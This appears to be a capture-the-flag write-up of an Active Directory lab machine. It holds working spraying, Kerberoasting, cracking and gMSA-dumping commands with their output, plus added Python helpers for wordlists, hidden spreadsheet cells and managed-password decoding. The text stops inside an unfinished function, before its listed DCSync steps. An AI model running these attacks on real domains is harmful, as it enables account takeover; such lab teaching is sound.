- Info Card
- Port Scanning
- Web enumeration, information disclosure
- Generate custom wordlist + Password Spraying
- Kerberoasting
- Password re-use
- Sensitive Information Disclosure through Excel workbook
- Access on PSWA as Sierra.Frye with PFX file
- Crack PFX File
- Import certificate in Firefox
- BloodHound enumeration
- Read gMSA Password
- Create PS-Credential object with gMSA password
- Force change password with GenericAll rights
- DCSync attack
Info Card
Port Scanning
➤ nmap -T5 -sCV -p- 10.10.11.129 -Pn
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Search — Just Testing IIS
| http-methods:
|_ Potentially risky methods: TRACE
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-04-17 13:27:09Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: search.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=research
| Not valid before: 2020-08-11T08:13:35
|_Not valid after: 2030-08-09T08:13:35
|_ssl-date: 2022-04-17T13:28:46+00:00; -1h43m08s from scanner time.
443/tcp open ssl/http Microsoft IIS httpd 10.0
| tls-alpn:
|_ http/1.1
|_http-title: Search — Just Testing IIS
| ssl-cert: Subject: commonName=research
| Not valid before: 2020-08-11T08:13:35
|_Not valid after: 2030-08-09T08:13:35
|_ssl-date: 2022-04-17T13:28:46+00:00; -1h43m08s from scanner time.
|_http-server-header: Microsoft-IIS/10.0
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: search.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2022-04-17T13:28:47+00:00; -1h43m08s from scanner time.
| ssl-cert: Subject: commonName=research
| Not valid before: 2020-08-11T08:13:35
|_Not valid after: 2030-08-09T08:13:35
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: search.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=research
| Not valid before: 2020-08-11T08:13:35
|_Not valid after: 2030-08-09T08:13:35
|_ssl-date: 2022-04-17T13:28:46+00:00; -1h43m08s from scanner time.
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: search.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=research
| Not valid before: 2020-08-11T08:13:35
|_Not valid after: 2030-08-09T08:13:35
|_ssl-date: 2022-04-17T13:28:47+00:00; -1h43m08s from scanner time.
8172/tcp open ssl/http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| ssl-cert: Subject: commonName=WMSvc-SHA2-RESEARCH
| Not valid before: 2020-04-07T09:05:25
|_Not valid after: 2030-04-05T09:05:25
| tls-alpn:
|_ http/1.1
|_ssl-date: 2022-04-17T13:28:45+00:00; -1h43m08s from scanner time.
|_http-title: Site doesn't have a title.
9389/tcp open mc-nmf .NET Message Framing
49666/tcp open tcpwrapped
49667/tcp open msrpc Microsoft Windows RPC
49675/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49676/tcp open msrpc Microsoft Windows RPC
49695/tcp open msrpc Microsoft Windows RPC
49696/tcp open tcpwrapped
49707/tcp open tcpwrapped
49710/tcp open msrpc Microsoft Windows RPC
49719/tcp open tcpwrapped
Service Info: Host: RESEARCH; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled and required
|_clock-skew: mean: -1h43m08s, deviation: 0s, median: -1h43m08s
| smb2-time:
| date: 2022-04-17T13:28:09
|_ start_date: N/A
Web enumeration, information disclosure
We can enumerate files and directories on the web server. There is a /staff path, but unfortunately we do not have access to it. There is also an image on the web server with writing on it, so let's take a closer look at /images/slide_2.jpg. Hope Sharp's password is disclosed there: IsolationIsKey?
Obviously, though, the account name will not literally be 'Hope Sharp':
➤ cme ldap 10.10.11.129 -d search.htb -u 'Hope Sharp' -p 'IsolationIsKey?'
SMB 10.10.11.129 445 RESEARCH [*] Windows 10.0 Build 17763 x64 (name:RESEARCH) (domain:search.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.129 445 RESEARCH [-] search.htb\Hope Sharp:IsolationIsKey?
Generate custom wordlist + Password Spraying
We can try generating a custom user list by hand from the name Hope Sharp:
➤ cat user.lst
Hope Sharp
Sharp Hope
HopeSharp
HopeSharp2021
HopeSharp2022
h.sharp
sharp.h
hope
sharp
Hope
Sharp
hope.s
Hope.Sharp
hope.sharp
h.Sharp
Hope.S
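The same list can be produced programmatically. The following is an added example, not code from the original writeup: it generalises the hand-written user.lst above by emitting the usual corporate naming conventions (first.last, flast, f.last, last.first, year suffixes) from a display name, de-duplicated and case-folded, so the output can be fed straight to `cme ... -u user.lst`. The pattern set and the year range are assumptions, not something the box tells us.

```python
"""Derive candidate account names from a display name for password spraying.

Added example; it is not part of the original writeup. Middle names are
dropped and "Last, First" input is accepted.
"""

# Assumed naming conventions; adjust to what OSINT shows for the target org.
PATTERNS = (
    "{first}.{last}", "{first}{last}", "{f}.{last}", "{f}{last}",
    "{first}.{l}", "{first}{l}", "{last}.{first}", "{last}{first}",
    "{last}.{f}", "{last}{f}", "{first}", "{last}", "{first} {last}",
)


def split_name(full_name: str) -> tuple:
    """'Hope Sharp' or 'Sharp, Hope' -> ('Hope', 'Sharp'); middle names ignored."""
    if "," in full_name:
        last, first = (p.strip() for p in full_name.split(",", 1))
        return first.split()[0], last.split()[-1]
    parts = full_name.split()
    if len(parts) < 2:
        raise ValueError("need a first and a last name")
    return parts[0], parts[-1]


def username_candidates(full_name: str, years=(2021, 2022)) -> list:
    """Ordered, de-duplicated list of probable sAMAccountName / UPN-prefix forms."""
    first, last = split_name(full_name)
    fields = {"first": first, "last": last, "f": first[0], "l": last[0]}
    raw = [p.format(**fields) for p in PATTERNS]
    raw += [f"{first}{last}{y}" for y in years]  # assumed year suffixes
    out, seen = [], set()
    for name in raw:
        for variant in (name, name.lower()):  # AD logon names are case-insensitive,
            if variant not in seen:            # but keep both forms for other targets
                seen.add(variant)
                out.append(variant)
    return out


def write_wordlist(names, path: str) -> int:
    """Write one name per line with no trailing blank line: a blank line makes
    cme attempt an empty username (likely the cause of the 'search.htb\\:' entry
    in the spray output above)."""
    with open(path, "w") as fh:
        fh.write("\n".join(names))
    return len(names)


if __name__ == "__main__":
    print("\n".join(username_candidates("Hope Sharp")))
```

Spraying a single password over many usernames keeps each account at one failed attempt, but check the lockout policy first (`cme smb <target> -u <user> -p <pass> --pass-pol`) before trying a second password against the same list.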
Let's password spray with this hand-built user list:
➤ cme ldap 10.10.11.129 -d search.htb -u user.lst -p 'IsolationIsKey?' --continue-on-success
SMB 10.10.11.129 445 RESEARCH [*] Windows 10.0 Build 17763 x64 (name:RESEARCH) (domain:search.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.129 445 RESEARCH [-] search.htb\Hope Sharp:IsolationIsKey?
SMB 10.10.11.129 445 RESEARCH [-] search.htb\Sharp Hope:IsolationIsKey?
SMB 10.10.11.129 445 RESEARCH [-] search.htb\HopeSharp:IsolationIsKey?
SMB 10.10.11.129 445 RESEARCH [-] search.htb\HopeSharp2021:IsolationIsKey?
SMB 10.10.11.129 445 RESEARCH [-] search.htb\HopeSharp2022:IsolationIsKey?
SMB 10.10.11.129 445 RESEARCH [-] search.htb\h.sharp:IsolationIsKey?
SMB 10.10.11.129 445 RESEARCH [-] search.htb\sharp.h:IsolationIsKey?
SMB 10.10.11.129 445 RESEARCH [-] search.htb\hope:IsolationIsKey?
SMB 10.10.11.129 445 RESEARCH [-] search.htb\sharp:IsolationIsKey?
SMB 10.10.11.129 445 RESEARCH [-] search.htb\Hope:IsolationIsKey?
SMB 10.10.11.129 445 RESEARCH [-] search.htb\Sharp:IsolationIsKey?
SMB 10.10.11.129 445 RESEARCH [-] search.htb\hope.s:IsolationIsKey?
LDAP 10.10.11.129 389 RESEARCH [+] search.htb\Hope.Sharp:IsolationIsKey?
LDAP 10.10.11.129 389 RESEARCH [+] search.htb\hope.sharp:IsolationIsKey?
LDAP 10.10.11.129 389 RESEARCH [-] search.htb\h.Sharp:IsolationIsKey?
LDAP 10.10.11.129 389 RESEARCH [-] search.htb\Hope.S:IsolationIsKey?
LDAP 10.10.11.129 389 RESEARCH [-] search.htb\:IsolationIsKey?
We have compromised a domain account: search.htb\Hope.Sharp:IsolationIsKey?
From here we can attempt several kinds of attacks.
Kerberoasting
Kerberos tolerates only a few minutes of clock skew and nmap reported the DC about 1h43m off from our scanner, so we first read the DC's time and run the Kerberos-based tooling under faketime:
➤ net time -S 10.10.11.129
Sun Apr 17 13:53:08 2022
➤ faketime '2022-04-17 13:55:00' cme ldap 10.10.11.129 -d search.htb -u Hope.Sharp -p 'IsolationIsKey?' --kerberoast krb5-tgs.txt
SMB 10.10.11.129 445 RESEARCH [*] Windows 10.0 Build 17763 x64 (name:RESEARCH) (domain:search.htb) (signing:True) (SMBv1:False)
LDAP 10.10.11.129 389 RESEARCH [+] search.htb\Hope.Sharp:IsolationIsKey?
LDAP 10.10.11.129 389 RESEARCH [*] Total of records returned 4
LDAP 10.10.11.129 389 RESEARCH sAMAccountName: web_svc memberOf: pwdLastSet: 2020-04-09 12:59:11.329031 lastLogon:<never>
LDAP 10.10.11.129 389 RESEARCH $krb5tgs$23$*web_svc$SEARCH.HTB$RESEARCH/web_svc.search.htb~60001*$4c1cf7c79f35e86aa4cd7a7ae496fa27$...
We obtain the TGS for web_svc, a service account. Since it is RC4-HMAC (etype 23), the ticket is encrypted with the account's NT hash and we can try to crack it offline:
➤ john krb5-tgs.txt --wordlist=/usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt --format=krb5tgs
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 12 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:01 0,02% (ETA: 17:18:12) 0g/s 0p/s 0c/s 0C/s
@3ONEmillionbaby (?)
1g 0:00:00:11 DONE (2022-04-17 15:41) 0.09033g/s 1038Kp/s 1038Kc/s 1038KC/s @4208891ncv..=123jacko
Use the "--show" option to display all of the cracked passwords reliably
Session completed
That worked: we recover the service account's password, web_svc:@3ONEmillionbaby, and confirm it against the DC:
➤ cme ldap 10.10.11.129 -d search.htb -u 'web_svc' -p '@3ONEmillionbaby'
SMB 10.10.11.129 445 RESEARCH [*] Windows 10.0 Build 17763 x64 (name:RESEARCH) (domain:search.htb) (signing:True) (SMBv1:False)
LDAP 10.10.11.129 389 RESEARCH [+] search.htb\web_svc:@3ONEmillionbaby
goldenPac.py reports the target as vulnerable to MS14-068 (the PAC-forgery bug it exploits), but this does not get us anywhere here: the ticket we obtain gives web_svc nothing useful, as there is no service the account can leverage it against. Note also that goldenPac.py's "found vulnerable!" check is known to flag patched domain controllers, so the message on its own proves little.
➤ faketime '2022-04-17 15:50:00' goldenPac.py -dc-ip 10.10.11.129 search.htb/web_svc:'@3ONEmillionbaby'@RESEARCH.SEARCH.HTB
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation
[*] User SID: S-1-5-21-271492789-1610487937-1871574529-1296
[*] Forest SID: S-1-5-21-271492789-1610487937-1871574529
[*] Attacking domain controller 10.10.11.129
[*] 10.10.11.129 found vulnerable!
Password re-use
With the user list pulled from the host over SMB we can push the enumeration further:
➤ cat users.lst
abril.suarez
Angie.Duffy
Antony.Russo
belen.compton
Cameron.Melendez
chanel.bell
Claudia.Pugh
Cortez.Hickman
dax.santiago
Eddie.Stevens
edgar.jacobs
Edith.Walls
eve.galvan
frederick.cuevas
hope.sharp
jayla.roberts
Jordan.Gregory
payton.harmon
Reginald.Morton
santino.benjamin
Savanah.Velazquez
sierra.frye
trace.ryan
We can look for users who reuse the cracked password:
➤ cme ldap 10.10.11.129 -d search.htb -u users.lst -p '@3ONEmillionbaby'
SMB 10.10.11.129 445 RESEARCH [*] Windows 10.0 Build 17763 x64 (name:RESEARCH) (domain:search.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.129 445 RESEARCH [-] search.htb\abril.suarez:@3ONEmillionbaby
SMB 10.10.11.129 445 RESEARCH [-] search.htb\Angie.Duffy:@3ONEmillionbaby
SMB 10.10.11.129 445 RESEARCH [-] search.htb\Antony.Russo:@3ONEmillionbaby
SMB 10.10.11.129 445 RESEARCH [-] search.htb\belen.compton:@3ONEmillionbaby
SMB 10.10.11.129 445 RESEARCH [-] search.htb\Cameron.Melendez:@3ONEmillionbaby
SMB 10.10.11.129 445 RESEARCH [-] search.htb\chanel.bell:@3ONEmillionbaby
SMB 10.10.11.129 445 RESEARCH [-] search.htb\Claudia.Pugh:@3ONEmillionbaby
SMB 10.10.11.129 445 RESEARCH [-] search.htb\Cortez.Hickman:@3ONEmillionbaby
SMB 10.10.11.129 445 RESEARCH [-] search.htb\dax.santiago:@3ONEmillionbaby
SMB 10.10.11.129 445 RESEARCH [-] search.htb\Eddie.Stevens:@3ONEmillionbaby
LDAP 10.10.11.129 389 RESEARCH [+] search.htb\edgar.jacobs:@3ONEmillionbaby
edgar.jacobs has the same password as web_svc. Let's see which shares that account can reach:
➤ cme smb 10.10.11.129 -d search.htb -u edgar.jacobs -p '@3ONEmillionbaby' --shares
SMB 10.10.11.129 445 RESEARCH [*] Windows 10.0 Build 17763 x64 (name:RESEARCH) (domain:search.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.129 445 RESEARCH [+] search.htb\edgar.jacobs:@3ONEmillionbaby
SMB 10.10.11.129 445 RESEARCH [+] Enumerated shares
SMB 10.10.11.129 445 RESEARCH Share Permissions Remark
SMB 10.10.11.129 445 RESEARCH ----- ----------- ------
SMB 10.10.11.129 445 RESEARCH ADMIN$ Remote Admin
SMB 10.10.11.129 445 RESEARCH C$ Default share
SMB 10.10.11.129 445 RESEARCH CertEnroll READ Active Directory Certificate Services share
SMB 10.10.11.129 445 RESEARCH helpdesk READ
SMB 10.10.11.129 445 RESEARCH IPC$ READ Remote IPC
SMB 10.10.11.129 445 RESEARCH NETLOGON READ Logon server share
SMB 10.10.11.129 445 RESEARCH RedirectedFolders$ READ,WRITE
SMB 10.10.11.129 445 RESEARCH SYSVOL READ Logon server share
We can connect to SMB with his credentials and browse his redirected home folder on RedirectedFolders$:
➤ smbclient.py htb.local/'edgar.jacobs':'@3ONEmillionbaby'@search.htb
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation
Type help for list of commands
# use RedirectedFolders$
# cd edgar.jacobs
# ls
drw-rw-rw- 0 Thu Apr 9 20:04:11 2020 .
drw-rw-rw- 0 Thu Apr 9 20:04:11 2020 ..
drw-rw-rw- 0 Mon Aug 10 10:02:16 2020 Desktop
drw-rw-rw- 0 Mon Aug 10 10:02:17 2020 Documents
drw-rw-rw- 0 Mon Aug 10 10:02:17 2020 Downloads
# cd Desktop
# ls
drw-rw-rw- 0 Mon Aug 10 10:02:16 2020 .
drw-rw-rw- 0 Mon Aug 10 10:02:16 2020 ..
drw-rw-rw- 0 Thu Apr 9 20:05:29 2020 $RECYCLE.BIN
-rw-rw-rw- 282 Mon Aug 10 10:02:16 2020 desktop.ini
-rw-rw-rw- 1450 Thu Apr 9 20:05:03 2020 Microsoft Edge.lnk
-rw-rw-rw- 23130 Mon Aug 10 10:30:05 2020 Phishing_Attempt.xlsx
# mget Phishing_Attempt.xlsx
Sensitive Information Disclosure through Excel workbook
There is a Phishing_Attempt.xlsx file, which is simply an Excel workbook; it opens fine in LibreOffice. It contains statistics on the number of passwords captured per year through phishing campaigns, and there is a second sheet worth a look. That sheet lists information about other users. When I try to resize the cells to check for hidden data, I am blocked: the sheet is protected. Sheet protection only locks the editing UI, it is not encryption, so whatever is hidden is still stored in the file. We can select everything by clicking the small square at the top left, then copy and paste without formatting to see whether more information turns up:
firstname lastname password Username
Payton Harmon ;;36!cried!INDIA!year!50;; Payton.Harmon
Cortez Hickman ..10-time-TALK-proud-66.. Cortez.Hickman
Bobby Wolf ??47^before^WORLD^surprise^91?? Bobby.Wolf
Margaret Robinson //51+mountain+DEAR+noise+83// Margaret.Robinson
Scarlett Parks ++47|building|WARSAW|gave|60++ Scarlett.Parks
Eliezer Jordan !!05_goes_SEVEN_offer_83!! Eliezer.Jordan
Hunter Kirby ~~27%when%VILLAGE%full%00~~ Hunter.Kirby
Sierra Frye $$49=wide=STRAIGHT=jordan=28$$18 Sierra.Frye
Annabelle Wells ==95~pass~QUIET~austria~77== Annabelle.Wells
Eve Galvan //61!banker!FANCY!measure!25// Eve.Galvan
Jeramiah Fritz ??40:student:MAYOR:been:66?? Jeramiah.Fritz
Abby Gonzalez &&75:major:RADIO:state:93&& Abby.Gonzalez
Joy Costa **30*venus*BALL*office*42** Joy.Costa
Vincent Sutton **24&moment&BRAZIL&members&66** Vincent.Sutton
And it does: the hidden column holds their passwords. Let's spray them to see which are still valid (--no-bruteforce pairs each line of offuser.lst with the matching line of offpass.txt instead of trying every combination):
➤ cme ldap 10.10.11.129 -d search.htb -u offuser.lst -p offpass.txt --continue-on-success --no-bruteforce
SMB 10.10.11.129 445 RESEARCH [*] Windows 10.0 Build 17763 x64 (name:RESEARCH) (domain:search.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.129 445 RESEARCH [-] search.htb\Payton.Harmon:;;36!cried!INDIA!year!50;;
SMB 10.10.11.129 445 RESEARCH [-] search.htb\Cortez.Hickman:..10-time-TALK-proud-66..
SMB 10.10.11.129 445 RESEARCH [-] search.htb\Bobby.Wolf:??47^before^WORLD^surprise^91??
SMB 10.10.11.129 445 RESEARCH [-] search.htb\Margaret.Robinson://51+mountain+DEAR+noise+83//
SMB 10.10.11.129 445 RESEARCH [-] search.htb\Scarlett.Parks:++47|building|WARSAW|gave|60++
SMB 10.10.11.129 445 RESEARCH [-] search.htb\Eliezer.Jordan:!!05_goes_SEVEN_offer_83!!
SMB 10.10.11.129 445 RESEARCH [-] search.htb\Hunter.Kirby:~~27%when%VILLAGE%full%00~~
LDAP 10.10.11.129 389 RESEARCH [+] search.htb\Sierra.Frye:$$49=wide=STRAIGHT=jordan=28$$18
LDAP 10.10.11.129 389 RESEARCH [-] search.htb\Annabelle.Wells:==95~pass~QUIET~austria~77==
LDAP 10.10.11.129 389 RESEARCH [-] search.htb\Eve.Galvan://61!banker!FANCY!measure!25//
LDAP 10.10.11.129 389 RESEARCH [-] search.htb\Jeramiah.Fritz:??40:student:MAYOR:been:66??
LDAP 10.10.11.129 389 RESEARCH [-] search.htb\Abby.Gonzalez:&&75:major:RADIO:state:93&&
LDAP 10.10.11.129 389 RESEARCH [-] search.htb\Joy.Costa:**30*venus*BALL*office*42**
LDAP 10.10.11.129 389 RESEARCH [-] search.htb\Vincent.Sutton:**24&moment&BRAZIL&members&66**
We have pwned the user Sierra.Frye:$$49=wide=STRAIGHT=jordan=28$$18
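The copy/paste trick above works because sheet protection is a UI lock, not encryption. As an added example (not code from the original writeup), the script below makes the same point without a spreadsheet application: it opens the xlsx zip container, reads xl/worksheets/sheet*.xml directly, reports whether sheetProtection is set, finds columns marked hidden or zero-width, and returns the cells stored in them. The workbook it parses is constructed in memory so the example runs offline; the header row mirrors the one recovered on the box, the values are made up.

```python
"""Pull values out of hidden columns in a 'protected' xlsx sheet.

Added example; not code from the original writeup. OOXML sheet protection
does not encrypt anything: cell values sit in plain XML inside the zip.
"""
import io
import re
import zipfile
import xml.etree.ElementTree as ET

NS = "http://schemas.openxmlformats.org/spreadsheetml/2006/main"
Q = {"m": NS}


def col_index(cell_ref: str) -> int:
    """'C2' -> 3, 'AB7' -> 28 (1-based column number)."""
    letters = re.match(r"[A-Z]+", cell_ref).group(0)
    n = 0
    for ch in letters:
        n = n * 26 + (ord(ch) - ord("A") + 1)
    return n


def load_shared_strings(z: zipfile.ZipFile) -> list:
    """Excel normally stores text in a shared-string table; resolve it if present."""
    if "xl/sharedStrings.xml" not in z.namelist():
        return []
    root = ET.fromstring(z.read("xl/sharedStrings.xml"))
    return ["".join(t.text or "" for t in si.iter(f"{{{NS}}}t"))
            for si in root.findall("m:si", Q)]


def cell_value(c, shared: list):
    """Resolve a <c> element to its string value (inline, shared or raw)."""
    if c.get("t") == "inlineStr":
        return "".join(t.text or "" for t in c.iter(f"{{{NS}}}t"))
    v = c.find("m:v", Q)
    if v is None:
        return None
    return shared[int(v.text)] if c.get("t") == "s" else v.text


def audit_workbook(xlsx_bytes: bytes) -> list:
    """Return, per sheet, protection status, hidden columns and their cells."""
    report = []
    with zipfile.ZipFile(io.BytesIO(xlsx_bytes)) as z:
        shared = load_shared_strings(z)
        sheets = sorted(n for n in z.namelist() if n.startswith("xl/worksheets/sheet"))
        for name in sheets:
            root = ET.fromstring(z.read(name))
            hidden = set()
            for col in root.findall("m:cols/m:col", Q):
                if col.get("hidden") in ("1", "true") or col.get("width") == "0":
                    hidden.update(range(int(col.get("min")), int(col.get("max")) + 1))
            cells = [(c.get("r"), cell_value(c, shared))
                     for c in root.findall("m:sheetData/m:row/m:c", Q)
                     if col_index(c.get("r")) in hidden]
            report.append({
                "sheet": name,
                "protected": root.find("m:sheetProtection", Q) is not None,
                "hidden_columns": sorted(hidden),
                "hidden_cells": cells,
            })
    return report


def build_sample_xlsx() -> bytes:
    """Constructed fixture: one protected sheet whose column C is hidden."""
    rows = [("firstname", "lastname", "password", "Username"),
            ("Jane", "Doe", "S3cret!pass", "Jane.Doe"),
            ("John", "Roe", "Wint3r2020", "John.Roe")]

    def cell(ref, text):
        return f'<c r="{ref}" t="inlineStr"><is><t>{text}</t></is></c>'

    row_xml = []
    for i, r in enumerate(rows, start=1):
        cells = "".join(cell(f"{chr(65 + j)}{i}", v) for j, v in enumerate(r))
        row_xml.append(f'<row r="{i}">{cells}</row>')
    sheet = (f'<worksheet xmlns="{NS}">'
             '<cols><col min="3" max="3" width="0" hidden="1" customWidth="1"/></cols>'
             f'<sheetData>{"".join(row_xml)}</sheetData>'
             '<sheetProtection sheet="1" objects="1" scenarios="1" password="CC1A"/>'
             '</worksheet>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml",
                   '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')
        z.writestr("xl/worksheets/sheet1.xml", sheet)
    return buf.getvalue()


if __name__ == "__main__":
    for entry in audit_workbook(build_sample_xlsx()):
        print(entry)
```

Run it against a real file with `audit_workbook(open("Phishing_Attempt.xlsx", "rb").read())`. The only thing that would have stopped this is workbook-level encryption (a password to open, which wraps the package in an OLE container), not sheet protection.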
Access on PSWA as Sierra.Frye with PFX file
We can access the shares with these credentials and grab the user flag:
➤ smbclient.py htb.local/'Sierra.Frye':'$$49=wide=STRAIGHT=jordan=28$$18'@search.htb
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation
Type help for list of commands
# use RedirectedFolders$
# mget user.txt
[*] Downloading user.txt
In Sierra.Frye's redirected folder we also find a .pfx file, which will let us into PSWA (PowerShell Web Access) on /staff:
smb: \sierra.frye\Downloads\Backups\> ls
. DHc 0 Mon Aug 10 20:39:17 2020
.. DHc 0 Mon Aug 10 20:39:17 2020
search-RESEARCH-CA.p12 Ac 2643 Fri Jul 31 15:04:11 2020
staff.pfx Ac 4326 Mon Aug 10 20:39:17 2020
smb: \sierra.frye\Downloads\Backups\> mget staff.pfx
For that we will import the PFX file into Firefox as a client certificate.
Crack PFX File
But first we need the import password of the PKCS#12 file. I'll use crackpkcs12 to try to crack it:
➤ crackpkcs12 -d $(locate rockyou.txt| tail -n1) staff.pfx
Dictionary attack - Starting 12 threads
*********************************************************
Dictionary attack - Thread 1 - Password found: misspissy
*********************************************************
Import certificate in Firefox
Great! We can import the pfx into Firefox as a client certificate. With the certificate presented, /staff becomes reachable, and we can log in to PSWA with Sierra.Frye's credentials.
BloodHound enumeration
We can collect BloodHound data with Sierra's credentials:
➤ bloodhound-python -u 'Sierra.Frye' -p '$$49=wide=STRAIGHT=jordan=28$$18' -d search.htb -v --zip -c All,Loggedon -dc search.htb -ns 10.10.11.129
The user we compromised (Sierra.Frye) is a member of the BIRMINGHAM-ITSEC group, which is itself a member of ITSEC. ITSEC has ReadGMSAPassword over the BIR-ADFS-GMSA object. BIR-ADFS-GMSA has GenericAll over the user Tristan.Davies, and Tristan.Davies is a member of Domain Admins.
Read gMSA Password
We can use gMSADumper to read the managed password over LDAP and derive the NT hash of BIR-ADFS-GMSA$:
➤ python3 gMSADumper.py -u 'Sierra.Frye' -p '$$49=wide=STRAIGHT=jordan=28$$18' -d 'search.htb'
Users or groups who can read password for BIR-ADFS-GMSA$:
> ITSec
BIR-ADFS-GMSA$:::e1e9fd9e46d0d747e1595167eedcec0f
Create PS-Credential object with gMSA password
From the PSWA session as Sierra.Frye we can read the managed password directly and build a credential object for the gMSA (Get-ADServiceAccount comes from the ActiveDirectory RSAT module, ConvertFrom-ADManagedPasswordBlob from DSInternals):
$gmsa = Get-ADServiceAccount -Identity BIR-ADFS-GMSA -properties msds-ManagedPassword # Read the msDS-ManagedPassword LDAP attribute (allowed via ITSEC's ReadGMSAPassword)
$mp = $gmsa.'msDS-ManagedPassword' # Raw MSDS-MANAGEDPASSWORD_BLOB
$securestring = ConvertFrom-ADManagedPasswordBlob $mp # Decode the blob (DSInternals); CurrentPassword becomes a SecureString
$cred = New-Object System.Management.Automation.PSCredential('SEARCH\BIR-ADFS-GMSA', $securestring.SecureCurrentPassword) # PSCredential usable with -Credential
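Both gMSADumper above and ConvertFrom-ADManagedPasswordBlob do the same thing once LDAP returns the attribute: decode the MSDS-MANAGEDPASSWORD_BLOB (MS-ADTS 2.2.19) and, for the hash, MD4 the UTF-16LE CurrentPassword. The following is an added example, not code from the writeup, gMSADumper or DSInternals, that does this decoding step. MD4 is written out in pure Python because hashlib on OpenSSL 3 builds frequently lacks it. The blob it parses is constructed here; a real one carries a 256-character random password and is obtained over LDAP, which this example does not do.

```python
"""Decode an msDS-ManagedPassword blob into the gMSA NT hash.

Added example; not code from the original writeup or the tools it uses.
Layout (MS-ADTS 2.2.19): Version u16, Reserved u16, Length u32, then four
u16 offsets (CurrentPassword, PreviousPassword, QueryPasswordInterval,
UnchangedPasswordInterval) measured from the start of the blob. Passwords
are null-terminated UTF-16LE; intervals are u64 in 100 ns units.
"""
import struct

MASK = 0xFFFFFFFF


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4; an NT hash is MD4 over the UTF-16LE password."""
    def rol(x, n):
        return ((x << n) | (x >> (32 - n))) & MASK

    def f(x, y, z):
        return (x & y) | (~x & z)

    def g(x, y, z):
        return (x & y) | (x & z) | (y & z)

    def h(x, y, z):
        return x ^ y ^ z

    msg = bytearray(data) + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", (len(data) * 8) & 0xFFFFFFFFFFFFFFFF)
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    r2 = (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15)
    r3 = (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        for i in range(16):
            a, b, c, d = d, rol((a + f(b, c, d) + x[i]) & MASK, (3, 7, 11, 19)[i % 4]), b, c
        for i in range(16):
            a, b, c, d = d, rol((a + g(b, c, d) + x[r2[i]] + 0x5A827999) & MASK, (3, 5, 9, 13)[i % 4]), b, c
        for i in range(16):
            a, b, c, d = d, rol((a + h(b, c, d) + x[r3[i]] + 0x6ED9EBA1) & MASK, (3, 9, 11, 15)[i % 4]), b, c
        a, b, c, d = (a + aa) & MASK, (b + bb) & MASK, (c + cc) & MASK, (d + dd) & MASK
    return struct.pack("<4I", a, b, c, d)


def nt_hash(password_utf16le: bytes) -> str:
    return md4(password_utf16le).hex()


def _utf16z(buf: bytes, start: int) -> bytes:
    """Slice a UTF-16LE string up to its 0x0000 terminator (checked at code-unit boundaries)."""
    for i in range(start, len(buf) - 1, 2):
        if buf[i] == 0 and buf[i + 1] == 0:
            return bytes(buf[start:i])
    raise ValueError("unterminated UTF-16 string in blob")


def parse_managed_password_blob(blob: bytes) -> dict:
    """Return current/previous NT hashes and the rollover intervals in seconds."""
    version, _reserved, length, cur_off, prev_off, qpi_off, upi_off = struct.unpack_from("<HHIHHHH", blob, 0)
    if version != 1 or length > len(blob):
        raise ValueError("not a version 1 MSDS-MANAGEDPASSWORD_BLOB")
    current = _utf16z(blob, cur_off)
    previous = _utf16z(blob, prev_off) if prev_off else b""  # offset 0 means no previous password
    qpi, upi = struct.unpack_from("<QQ", blob, qpi_off)
    return {
        "nt_hash": nt_hash(current),
        "previous_nt_hash": nt_hash(previous) if previous else None,
        "query_password_interval_s": qpi // 10_000_000,
        "unchanged_password_interval_s": upi // 10_000_000,
    }


def build_blob(current: str, previous: str = "") -> bytes:
    """Constructed fixture laid out as AD emits it (intervals 8-byte aligned)."""
    cur = current.encode("utf-16-le") + b"\x00\x00"
    prev = previous.encode("utf-16-le") + b"\x00\x00" if previous else b""
    cur_off = 16
    prev_off = cur_off + len(cur) if previous else 0
    body = cur + prev
    body += b"\x00" * ((-(cur_off + len(body))) % 8)
    qpi_off = cur_off + len(body)
    upi_off = qpi_off + 8
    intervals = struct.pack("<QQ", 3600 * 10_000_000, 30 * 86400 * 10_000_000)  # assumed values
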